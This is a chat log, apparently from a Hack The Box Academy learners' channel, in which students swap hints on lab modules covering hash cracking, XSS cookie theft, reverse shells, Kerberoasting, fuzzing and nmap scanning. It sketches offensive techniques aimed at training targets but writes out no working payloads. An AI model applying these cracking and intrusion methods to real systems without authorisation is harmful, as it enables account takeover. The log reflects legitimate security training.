#

I think the command is ++verify in bot commands

granite patio
#

Got it, thanks!

lethal atlas
#

hello everyone.

raven cairn
#

Wassup

#

You changed your pfp 😭😭😭

vital adder
#

nooooo you removed the cat

raven cairn
#

The cat was cute

lethal atlas
#

LOL

#

That cat is the devil. Constantly tormenting my other cat and bringing me live animals, then letting them go in my house

quasi bone
#

newbie question, do we get to use Kali Linux in the academy? And Blurp Suite? Tnx

raven cairn
lethal atlas
raven cairn
#

No blurp suite pro 😭

#

But blurp suite pro is not necessary

lethal atlas
#

They both have pros and cons. I can use some tools more efficiently in one over the other. But it just depends.

#

For instance, I cannot get some gdb add ons to work but they work fine in Kali

raven cairn
#

Interesting but your opinions are now invalid cuz you don't have the cat profile pic

#

🤣

lethal atlas
#

whats up @tulip grove

potent ermine
#

Hey guys I'm on the Bind shells lesson. I connected via ssh to the target and set up the listener, and entered the line to generate the shell. However, on the attack side, I only see the text output. Did I miss anything?

ornate sparrow
#

Would someone be willing to help a newb attempting to get through the Starting point?

burnt stone
ornate sparrow
#

Starting point, tier one, box 3. Following the walkthrough, the instructions say to use Wappalyzer and you will see that it's using PHP. I get all the other info but PHP doesn't show up. Oh well, moving on. Walkthrough says to use this string:

#

echo "{target Box IP here} thetoppers.htb" | sudo tee -a /etc/hosts

#

But I'm not seeing a result in my terminal. Additionally, all instructions after this fail.

#

Sorry, I see what you're saying. Sadly I can't seem to access the starting point

ornate sparrow
frigid monolith
#

Can anyone give me a nudge on the ad assessment part 1?

#

It's asking for clear text creds for another domain user. Does this mean any other we uncovered or a specific one for this module?

spring sigil
thorn urchin
frigid monolith
#

I assume they don't mean kerberoast then

potent ermine
rustic sage
#

hello there! I am at the XSS module, doing the phishing page.. I make the login page fine, start up the PHP server, the encoded phishing URL gets sent, but there is no movement on the side of creds.txt..

I would appreciate any help very much
https://academy.hackthebox.com/module/103/section/984

ornate sparrow
spring sigil
potent ermine
quasi bone
#

@lethal atlas thank you!

warm kernel
rain leaf
#

how do i get access to talk in the other chats?

thorn urchin
#

verify your account

#

the welcome channel isn't just for show

warm kernel
#

this is taking forever, does anyone have the answer they can ship me in private?

#

after verifying my cmd is correct of course... but this is taking so damn long >.>

warm kernel
#

yeah

lethal atlas
#

how did I know lol

#

That module took forever

warm kernel
#

8 chars, all chars and numbers... why do they choose passwords that take forever to crack... watch the machine time out before it's even done ./facepalm

lethal atlas
#

which question are you on

warm kernel
#

Hash found, and used in the cmd

#

I put it in crackstation in the hopes it's a standard one... but alas it's not...

lethal atlas
#

wait that is the Footprinting module

warm kernel
#

yeah

lethal atlas
warm kernel
#

yeah, that's how I got the hash

rustic sage
#

What is the john/hashcat command you're running?

lethal atlas
#

I'm confused then. what's the question

rustic sage
warm kernel
#

here's the cmd

lethal atlas
#

my bad.

warm kernel
#

more like it's going to take 20 hours...

rustic sage
#

you're trying to guess the password character by character for 8 characters

#

just use a wordlist

lethal atlas
#

yep

warm kernel
#

I did

#

in the msfconsole

#

no results

rustic sage
#

you don't know the password is 8 characters, so why are you assuming it is?

lethal atlas
#

your hashcat is all wrong

warm kernel
#

just from the lesson, I'm implying

rustic sage
#

nononononoo

#

that is why it's taking forever

warm kernel
#

copy pasted from the lesson, so they are wrong as well?

thorn urchin
#

oof assuming the example is the same situation as the assessment

rustic sage
lethal atlas
rustic sage
#

the IPMI password isn't a default

warm kernel
#

I'm going off of this

rustic sage
#

yes that is for the default password

#

the IPMI password for this lab isn't default

warm kernel
#

those 2 default passwords don't work. And the wordlist mentioned in msfconsole doesn't return anything either

rustic sage
#

and you can't just assume it is or else you'll be stuck in this waiting game for a brute force attack that might not work

#

you have the hash

#

you should use wordlists to crack it

#

Not all wordlists are the same😉

warm kernel
#

well they could put in a darn hint in there to avoid wasting people's lives/time ./facepalm... I tell you sometimes I question the value of these lessons...

lethal atlas
#

but rockyou rocks

warm kernel
#

rockyou is another that'll take forever...

thorn urchin
#

you gotta learn to be able to adapt from just rote memorization of the material to actually prove you understand it

rustic sage
#

rockyou won't take forever

thorn urchin
#

it's a very very common theme amongst the whole course

lethal atlas
#

it took less than 1 minute to crack

rustic sage
#

also @warm kernel it says in the module next to that command In the event of an HP iLO using a factory default password

warm kernel
#

the others I've just roughly followed and it was enough though... this isn't hacking, it's just a lesson... ffs this pisses me off, such a weak machine and so many options for just a lesson. Very ineffective if you ask me

thorn urchin
#

I think your viewpoint is pretty warped

#

this is indeed true to life hacking

lethal atlas
#

I felt this module tied together with broken auth and password attacks very well.

thorn urchin
#

copy pasting from tutorials only gets you so far, you have to actually understand the content and know how to properly apply it

lethal atlas
#

I guess it's all how you read it. I never once thought to attempt to blindly brute force the password

#

I instantly went to rockyou

thorn urchin
#

There are later modules that will actively be harder if you use the rote method they teach instead of synthesizing and utilizing lessons from prior modules to do better.

warm kernel
# thorn urchin this is indeed true to life hacking

I am a junior pentester already employed, I'm doing this to add to other skill sets, I'm not here to waste time brute forcing lists. This is supposed to be a lesson. I'll apply proper techniques on a box/pentest, not lessons. Not sure I agree with your view, time is short, and wasting it on ineffective things for lessons isn't the way to go about it

rustic sage
lethal atlas
#

or maybe the lesson is to teach you a method and learning it may save you time in the future? just my thought

thorn urchin
#

Well I'm more optimistic about my future employment prospects now

warm kernel
#

yeah, I'm venting on the lesson though

rustic sage
#

just use a wordlist crack the hash and move on

warm kernel
#

pretty much yeah

spring sigil
rustic sage
#

it is very true not every lesson is copy/paste. Especially if you're on the CPTS path (which I assume you are) you will have to learn and understand the concepts and apply them. Future modules aren't copy/paste, it's apply what you learned research more if needed

lethal atlas
#

just an fyi but the average time to crack an 8 character password is 84 days.

spring sigil
warm kernel
lethal atlas
#

could be. My point is that even with a super computer, the odds of cracking a password without using a wordlist in the time allotted has got to be .000000000000000000000000000000000000000001

warm kernel
#

I just assumed it would have been at the start of the search like other labs do

rustic sage
#

never assume😉

lethal atlas
warm kernel
#

yeah I already got it, thanks!

raven cairn
#

Tysm

rustic sage
# warm kernel yeah I already got it, thanks!

Just a FYI. If you were able to tell that the IPMI was HP iLO, you're assuming it's using default creds, AND you weren't able to extract any hashes then you'd use that hashcat command to attempt to brute force the default password, but yes this will take a lot of time

rustic sage
warm kernel
#

sorry for the rant gents 😦

rustic sage
#

nah you're good

#

it does get frustrating at time, but you learn from it🤷‍♂️

#

just wait until you get to Password Attacks😊

warm kernel
#

lol, at this point, im not assuming anything with these labs

#

would have saved me alot of time, ahah

spring sigil
#

Feel free to dm me @potent ermine if that doesn't clear it up

lethal atlas
#

speaking of... I'm on the section "Pass the Ticket (PtT) from Linux" and I can't ssh in with the creds they provide.

spring sigil
lethal atlas
#

hmmm maybe there is an issue

spring sigil
#

ah, mine didn't get as far as to ask for the password

rustic sage
#

The username for the domain is david@inlanefreight.htb

lethal atlas
#

that worked. Very confusing

rustic sage
#

yeah it got me at first too. Just remember it's a domain user so you need to include the full domain

lethal atlas
#

typically that would have been the command.

potent ermine
odd harness
#

Hi is anyone a good hacker

pastel ginkgo
#

suspect as fuck gifs

#

@sharp cove @novel matrix @languid dawn

raven cairn
#

Sup HellsCrypt

#

Have you finished that AD module yet?

pastel ginkgo
#

yeah

raven cairn
#

I'm getting to the skills assessment and I'm scared

#

💀

#

Hope it is not too difficult

pastel ginkgo
#

lol I literally went back and redid all my notes

#

I call that one the midterm

#

Soo should ffuf be only getting errors and finishing 100k requests in 1 sec?

novel matrix
shut matrix
#

Is this the place to post questions?

raven cairn
#

B/L???

raven cairn
odd harness
#

HtB finder

#

I need to find a hacker

shut matrix
#

Wonderful my question is simple, I'm going through Windows Fundamentals

pastel ginkgo
#

lol that module is a beast

shut matrix
#

I'm into examining services using sc

#

When I pass sc qc wuauserv

#

Into PowerShell

#

I'm not getting anything returned

pastel ginkgo
#

Are you in a reverse shell

shut matrix
pastel ginkgo
#

that could be why

#

I had a hard time getting my reverse shell to always give output

#

I think it doesn't get caught because it's not sent as standard out but as standard error which we don't send back on the shell

#

so either your command is formatted wrong or you can see if you change the output to a txt and read that

shut matrix
#

I'll give that a try

raven cairn
#

Stupid question. What tool would I use to log in??

#

There are so many different tools introduced in this module that it hurts my head

rustic sage
#

try them all 🙂

raven cairn
#

lol

rustic sage
#

see what works and what doesn't and why

raven cairn
#

Ok I'll try harder haha

rustic sage
#

I really haven't done the AD modules yet so I can't help lol try RDP, SSH, WinRM whatever is open

shut matrix
#

lmao

#

I got it

#

I had to be in CMD

#

Rather than PS

pastel ginkgo
#

I finished the AD module Sunday so it's still fresh lol

raven cairn
#

How long did it take for you to do both Skills assessments?

thorn urchin
#

for me AD1 was maybe an hour or two, Idr. but AD 2 was 8 hours.

thorn urchin
pastel ginkgo
#

3 days for me lol

#

a day for 1 and 2 for the 2nd

raven cairn
#

Oh god

thorn urchin
#

It's unarguably the hardest assessment in the whole course I've done so far

#

but also the best

raven cairn
#

AD is a weak point for me, so it is good to get out of my comfort zone

thorn urchin
#

and ftr I'm at 76.5% of cpts course completion

#

I'm sure one of the latter ones might be tougher

pastel ginkgo
#

just be happy the module after AD is easy but a total stinker and you get to push a button 300 times till the flag drops like a shitty WoW boss

raven cairn
#

Lol I don't do the modules in order

#

💀

keen raft
#

what module will help me to crack passwords

thorn urchin
#

but be warned, it's def one of the worst and most infuriating modules

#

I believe there's also a hashcat specific module as well, but not tied to the courses.

keen raft
#

I'm a complete beginner, what would you recommend to start me off

thorn urchin
#

complete beginner in password cracking or complete beginner in general?

pastel ginkgo
#

Do cracking into htb then Basic toolset if your totally new

thorn urchin
#

if in general I def recommend just following the CPTS course, but if you need some linux experience I'd do that path first

keen raft
#

ok thanks

sly tapir
#

could someone throw me a hint on this file inclusion skill assessment... I'm at ||the admin panel|| am I in the right place?

sly tapir
thorn urchin
#

yeah you're in the endgame now

pastel ginkgo
#

so did the academy site go down or me running ffuf get me banned by the ips

#

as the ffuf module said to run ffuf on it and now I can't reach the site lol

#

it's back, I'm convinced it blocked me lol

brisk geode
#

Module: Cross Site Scripting/Session hijacking

Q: Try to repeat what you learned in this section to identify the vulnerable input field and find a working XSS payload, and then use the 'Session Hijacking' scripts to grab the Admin's cookie and use it in 'login.php' to get the flag.

I followed everything mentioned on the page but ain't getting a request on the php server

fervent vessel
#

Hi all, I'm doing the DOCUMENTATION & REPORTING module, do you know which tool is used in the report example to paste code lines? I'm trying to use LaTeX but pasting code is so frustrating.

#

I can't paste the image but it is the sample report in the resource box

lament hollow
#

This may be a dumb question but... The AD Enumeration and Attack module references Snaffler which is a C# tool but it never actually talks about compiling the program which does not come pre-compiled. I've tried to poke around compiling from the linux attack host with mono before transferring as well as transferring the source to a Windows host and compiling with MSBuild but both had failures.

How do people compile C# programs that use .sln and .csproj files (not just a standalone .cs) when you don't have VSCode available?

kind turret
iron plaza
#

can anyone help me out with the Introduction to Windows Command Line (User and Group Management)? got one question relating to domain user

fringe arch
#

I found all except that one, I used msf too. But I do not have any clue. Can u help me with a hint.

Edit: 😩 after a lot of time, i got it.

tidal mango
#

Finished AD1... that was a bear! I can't imagine 2 will be any easier....

vital adder
vital adder
fallow ginkgo
#

Any tips for making ||Examine the target and find out the password of the user Will. Then, submit the password as the answer.|| go along a bit quicker? The provided hint doesn't work (||I'm assuming they want me to riff off of the password given with a mutated list but not sure||)

vital adder
#

which module and section are you on?

vital adder
# keen raft im a complete beginner what would you reccomend to start me off

if you are new to this I recommend you give both of these a check to see what you should and need to learn first
https://www.youtube.com/watch?v=0vu_Hs4N8B8
https://www.youtube.com/watch?v=lhz0-qAQlBM

brisk geode
vital adder
#

i'm pretty sure it is but let me double check

#

yep it is one of the ||example payload|| would work for this

fallow ginkgo
iron plaza
vital adder
dapper temple
#

If you purchase cubes do you get the cubes automatically credited in you account?

vital adder
#

yep if you buy the cubes it should be added instantly into your account

#

https://academy.hackthebox.com/achievement/453129/167
nice module but the holding ctrl and backspace to delete a whole word in powershell on the domain controller is kinda F so that's a bit annoying for long command

rustic sage
#

fuzzing

red obsidianBOT
#

There is no flag here. Get back to hacking!

stiff moon
#

yo quick question. a couple of weeks ago i won a silver annual voucher and my question is will i keep all the modules i have done and unlocked after the voucher runs out?

rustic sage
stiff moon
tribal quail
#

Is there a list of retired machines that use part of a module? Like the file inclusion module is fun but I would love to have practice of them on machines and not on the too easy examples in the module.

solar granite
#

Also there's ippsec.rocks

tribal quail
#

Ippsec rocks could indeed be handy. Seems to be what I was looking for

dawn forge
#

Hello everyone, Does anyone tried Deserialization module in HTB Academy? Need a little hint for the last flag :))

rustic sage
rustic sage
#

Greetings!

#

Anyone working around the meterpreter module?! Been stuck for a while 😦

#

OMG finally finished Password Attacks🥳 Learned so much but damn that took time

lethal atlas
rustic sage
candid zephyr
#

Hey this is a stupid question - I redeemed a voucher into the Academy but seem unable to actually do anything with it haha. It's nbd but wondered what's the point of such a feature? Is it purely for the CPTS? If so maybe I'll just have to add a bunch more and commit.

frozen lava
#

HELLO

gusty fulcrum
#

Hello

sly reef
#

can someone help me out with windows commandline introduction module?

unique valve
thorn urchin
jagged acorn
#

Hi

thorn urchin
#

contact support

sharp depot
#

Oh im so dumb :DDD

#

I got it

rustic sage
#

I just finished the Learning Process module and I must confess, it is a gem, a masterpiece, a module of knowledge, wisdom and understanding. My mentality has undergone series of changes for the past 2 weeks as I took notes. Kudos and thank you to HTB and the writer(s) of that module. You have given me an invaluable information I can go back to study often and not get bored. To any who'd take the module, I recommend taking notes (even though it's not infosec technical), actually writing because writing causes thinking, it convinces your mind to know you're not wasting your time and also absorbs the information like foam to water.

My 2 cubes.

#

You can do this!!

pastel ginkgo
#

For the ffuf assessment what's the format it wants for the first answer? I've tried just the name of the subdomain as well as xxx.academy.htb // http://xxx.academy.htb

#

it wont take any of the 3 subdomains I found in any of those formats

thorn urchin
#

it wants all, just the subdomains, separated by a space

#

xxx yyy zzz

pastel ginkgo
#

awesome thanks, that should be noted as a hint

rustic sage
pastel ginkgo
#

Yeah but when they want a specific format they usually specify

thorn urchin
#

it should say Only write the sub-domain names

#

as well

pastel ginkgo
#

I tried listing them all with , between each at first

thorn urchin
#

plural helps

sly reef
#

hey guys, final assessment is asking for this: To grab this final flag, what user account has many Event ID (4625)

#

I'm running: Get-WinEvent | Where-Object {$_.ID -eq "4625"}

#

but I am unable to get the name output. Any idea?

night pier
#

Anyone finish the Attacking Authentication Mechanisms skill assessment? I'm at the point where I have to send first name last name email and password, I craft my jwt token but it's not accepted.

thorn ingot
#

What does '^ii' indicate?

lethal atlas
thorn ingot
lethal atlas
#

That does not help. In fishing, soccer, knitting, it means nothing. In Bash, or python, or something else it may have different meaning

thorn ingot
#

In bash

lethal atlas
#

there we go. In Bash the ^ is used for xor.

#

but as far as ^ii I haven't seen that before.

#

can you post a line of the code, maybe it will help identify the purpose

thorn ingot
#

dpkg -l | grep -c '^ii'

#

From my understanding, this counts the packages installed but doesn't count the first line

lethal atlas
#

in that case it is looking for the string ^ii in the list of packages

#

it wont count them but it will list them

#

now if you add | wc -l it will count

high totem
#

Hey, can anyone help me with Credential Hunting in Linux in Passwords Attacks? I don't get what should I do. I have the username in the task, but the whole section is about the local credential hunting, not remote, so I don't think the point is to spam the target with crackmapexec. In the hint there are credentials for other user, but they do not work for the target. What am I missing?

thorn ingot
thorn ingot
candid zephyr
lethal atlas
candid zephyr
#

so it'll only list something if the line begins with ii

lethal atlas
#

ty @candid zephyr

#

regex still gets me

lethal atlas
candid zephyr
#

if you exclude the ^ it'll show every instance of ii in the file.

thorn ingot
lethal atlas
#

ahhh

thorn ingot
candid zephyr
thorn ingot
#

Thank you for clarifying things @lethal atlas

lethal atlas
#

I only helped a little, @candid zephyr brought us home.

frigid monolith
#

Could anyone give me a nudge on ad assessment part 1? I'm looking for the other user with a clear text password. I tried snaffler and got nothing.

flint helm
#

At AD Enumeration & Attacks - Skills Assessment Part II question 8 (Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.) I've found hashes with lazagne but I've been unable to login with them or crack any. dcsync and kerberoasting didn't work and I haven't found anything with snaffler either.

thorn urchin
modest token
#

Has anyone completed the ATTACKING COMMON APPLICATIONS Other Notable Applications skill assessment? I know that the vulnerable app is ||WebLogic ||I even found the exploit for it on exploitdb and I think it's running correctly, but I can't figure out what reverse shell to use on it. I've basically gone through all of the reverse shells on revshells.com and none have stuck. Can anyone give me a nudge in the right direction? 🙏

high totem
#

Ok, I've basically gone through like 3.5k passwords for Kira. That's more or less max I can do in 90 the lab is giving me, before changing the IP. What am I doing wrong? I generated the mutated password list using the provided rule and LoveYou1 from the hint. I took every password that was even remotely similar to "love" from the 94k passwords I get when running this rule on the password set provided in the zip. Still hydra doesn't find anything. Why is accessing the machine taking me more time than the task itself? I've been stuck for a few WEEKS on that!

compact apex
#

Hey I have a question, I try to nslookup the target for the active domain enumeration module in info gathering but I always get "server could not be found", can someone help?

lethal atlas
compact apex
compact apex
lethal atlas
#

dm me and lets work thru your commands

compact apex
#

ok

swift osprey
#

Hello

Anyone have suggestions about this?

I have some text file in desktop, I want to open the text file in my kali terminal directly by double clicking it

Is that possible?

Instead of opening terminal and typing cat <file name> , I want the text file to open in terminal directly

thorn urchin
marble raft
#

Hi guys, need some help on the Type Filters section of the File Upload module.
Managed to bypass the filters and upload the shell but trying to access it I get an error

The image cannot be displayed because it contains errors.

thorn urchin
thorn urchin
#

also you got some spoilers in there

marble raft
marble raft
thorn urchin
#

payload looks good, not sure of the issue. Maybe drop the : from your filename, I don't think that's needed and the server may be parsing it weird.

compact apex
modest token
marble raft
thorn urchin
#

interesting, I def used jpg on mine, but whatever works

lethal atlas
thorn urchin
#

I also had a nearly completely different strategy than what was taught in the module as well, so I may have simply stumbled across a combo that worked easier. Bout half a dozen combos actually

lethal atlas
#

has anyone done the PTT from linux portion of password attacks?

rustic sage
lethal atlas
shut matrix
#

Hey all just a quick question on nmap

#

I'm working through the enumeration module

#

One of the questions is to enumerate all ports and their services

#

I am using sudo nmap 10.129.2.28 -p- -sV --stats-every=5s

#

My question is how long should a scan take

#

For a full scan

rustic sage
#

nmap scans can take a long time especially if you’re scanning all ports. It really depends on a lot of factors

within that module you will learn a lot of techniques to speed it up

shut matrix
#

Right, as for this part should I just let it run

rustic sage
#

for now add -Pn -n --disable-arp-ping

#

that will speed it up a little bit

shut matrix
#

Alright ty

#

Would my connection also impact speed of nmap

shut matrix
rustic sage
#

-Pn basically says don’t ping the box/port assume it’s up. This option alone will save a lot of time

pastel ginkgo
#

Is it possible to brute force a login page using ffuf rather than Hydra?

rustic sage
#

UDP always takes forever so good luck with that one😂

rustic sage
pastel ginkgo
#

I'm going to give it a try, I finished the ffuf module earlier today and am on the brute forcing one that's taking forever with hydra

raven cairn
#

Could I have some help on the Active Directory Skills assessment 1?

#

|| I am trying to perform Kerberoasting. I transferred PowerView.ps1 to the target. And I am trying to extract TGS tickets. Not having luck with this method. I've also had issues by getting the tickets into memory and extracting them with mimikatz. Wondering what I am doing wrong ||

#

Should be pretty straightforward after I crack the hashes with hashcat

thorn urchin
raven cairn
#

Doing this module before Pivoting, Tunneling and Port Forwarding was a bad idea

#

haha

thorn urchin
#

I mean it never suggests you do it that way, it's just my preferred method for most of the module. Less files dropped on the targets

#

it burned me a little on one step of ad 2 but meh, that's life

#

finding exactly one scenario within two ad assessments where mimikatz outperformed proxying impacket tools is perfectly good enough in my books lol

raven cairn
#

Lemme show my issues with PowerView

rustic sage
#

you should do the modules in order that’s what they were designed for😉

thorn urchin
raven cairn
#

Oh ok

#

That makes sense

thorn urchin
#

I think each input command into the webshell is actually spawning a new process, so after you import the module it'll immediately forget about it

raven cairn
#

Cool. i'll try that out

solar glen
#

Hi guys,
I'm working on GETTING STARTED - Knowledge Check (GetSimple CMS 3.3.15),
I'm answering the first question "Spawn the target, gain a foothold and submit the contents of the user.txt flag."
Now I have a foothold, and when I type sudo -l, it shows up like in the picture.
I have a question about (ALL : ALL) NOPASSWD: /usr/bin/php
Is it possible for all users to execute the sudo command while in the /usr/bin/php directory?

sly tapir
#

I'm doing this session security module: XSS (netcat) .... my output is waaay different than the example....anybody else have this issue?

sly tapir
raven cairn
#

Does it work tho?

#

Cuz that's what matters most

sly tapir
#

Yea, I mean the XSS outputs to netcat...so it does work...I just can't follow along because I don't have the key it output

raven cairn
#

You could also try doing it on pwnbox

sly tapir
#

yea you right haha

raven cairn
#

Also, if I recall correctly, I think you save the cookie

sly tapir
#

yea it has me decode it in the console

safe talon
#

Good Morning, I'm doing the introduction to NoSQL injection module and I'm hanging at the 2nd Skill Assessment II (https://academy.hackthebox.com/module/171/section/1692). I tried everything I learned in this module, but nothing works. I tried every input field, I think the login is the only input field which is vulnerable. It would be awesome if someone can give me a nudge. What I noticed is that the backend is python, not php or nodejs.

vagrant ermine
#

Do more people have problems with the Three: very easy box?

#

I can't find the domain s3.thetoppers.htb with gobuster.

silent mulch
#

Hello All,

I am trying to improve my python scripting and automation skills by automating some of the tasks, I wanted to ask if someone has already done that using HTB Academy modules or if that will be a good idea to work on?
If not, can someone please help me with additional suggestions?

#

I am basically planning to pick up tasks in the modules, first complete them manually, then automate them using python.

vital adder
vagrant ermine
#

I got it, it worked with something someone already explained. Sorry

#

But is it possible that the website no longer runs with php

vital adder
sinful falcon
#

Anyone available for Attacking Common Services - Hard please?

silent mulch
#

:/ okay

vital adder
sinful falcon
vital adder
#

yeah I got no note of what wordlist I used for some reason, but rockyou should work

#

also shoot me a dm on what you are brute forcing

spring sigil
rotund umbra
#

hi

#

I am new

spring sigil
#

Nice!

#

What exactly am I doing wrong here? Searching the error on google wasn't very helpful either

vital adder
#

use single quotes

spring sigil
#

Same issue

vital adder
#

oh wait, I forgot Kali is using the zsh shell

#

only bash has issues with special characters

#

you got a connection issue

#

check if your target is still alive and the vpn is still working

spring sigil
#

I'll try resetting the target again

#

somehow it works now...:D

cobalt prism
#

Hey guys, getting stuck at an exercise in bash scripting

```bash
#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
        var=$(echo $var | base64)

        #<---- If condition here:
done
```

Need to answer this question

Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.

Can anybody help? My initial thought is to write something like this, but no correct answer is printed

```bash
#!/bin/bash

var="8dm7KsjU28B7v621Jls"
value="ERmFRMVZ0U2paTlJYTkxDZz09Cg"

for i in {1..40}
do
        # re-encode var on every iteration (unquoted, as in the exercise template)
        var=$(echo $var | base64)
        # both conditions: length over 113450 and value is a substring of var
        if [[ ${#var} -gt 113450 && $var == *"$value"* ]]
        then
          # last 20 characters of var; "echo $var | tail -c 20" would count
          # echo's trailing newline as one of the 20 and print only 19 characters
          echo "${var: -20}"
        fi
done
```

Thanks in advance!

rustic sage
#

how can i update the rank?

rustic sage
#

a Linux appeared in my task manager, what can it be?

rustic sage
#

@rustic sage the modules don't interfere with the rank?

#

I started a short time ago, I started using this like a week ago, I completed the

  • Metasploit
  • Introduction to Network
  • Sql injection fundamentals

But my rank is still very low :(

rustic sage
latent sage
sly kelp
#

Hello, I am having trouble accessing the Web Service and API Attacks module. There is a particular question where, when I access it, the whole academy website stops responding. Everything else is working fine, but due to that I can't complete the module.

lethal atlas
#

Holy hell. Finally finished the PtT section of password attacks and I apparently found an unintended way of getting the flag from LINUX01. Interesting section to say the least

rustic sage
#

Can someone help me with this error?

#

Received content contained invalid JSON!

#

And this is the line of code, it's in the WEB request, POST

runic rampart
#

Good evening! Can anyone help with Introduction to Deserialization Attacks-Skills Assessment?

crisp remnant
#

Hey guys, can I ping anyone about the XSS module? I have something that should be working, but it doesn't

lethal atlas
rustic sage
lethal atlas
#

still not working?

cobalt prism
lethal atlas
#

@cobalt prism feel free to dm me

wispy fjord
#

hi

lethal atlas
#

hello

wispy fjord
#

any idea how to get the different types of roles?

lethal atlas
#

You do stuff on the main HTB site

#

the more you do there, the higher your rank here.

wispy fjord
#

There's no field for "account identifier" in settings for me

#

Nvm I was on the academy settings

proud pine
#

Man, I had been avoiding learning manual SQL injection for the longest time, but the training module was actually super easy.

#

I don't think that deserves to be qualified as 'medium' lol

wispy fjord
#

meanwhile me here getting confused on the "learning process" module

pastel ginkgo
#

For the bruteforcing module Service Login assessment, for the "user" do they mean ||harrypotter|| ??? As that's the only name I've found during the previous skills assessment.

thorn urchin
pastel ginkgo
#

This module has been kinda confusing in random parts as far as question formatting

#

I'm not sure if I'm supposed to be bruteforcing the username or the password or both

#

like the hint says to add more info am I supposed to go to the harry potter wiki to get more info? lol

proud pine
#

It's... definitely not the best module lol

thorn urchin
#

yeah just the name works

#

but I definitely hate that it requires information from a previous section to proceed

pastel ginkgo
#

I feel like the other module that had a ton of hydra is way better than this module lol

#

Would be cool if they expanded it on using ffuf to brute force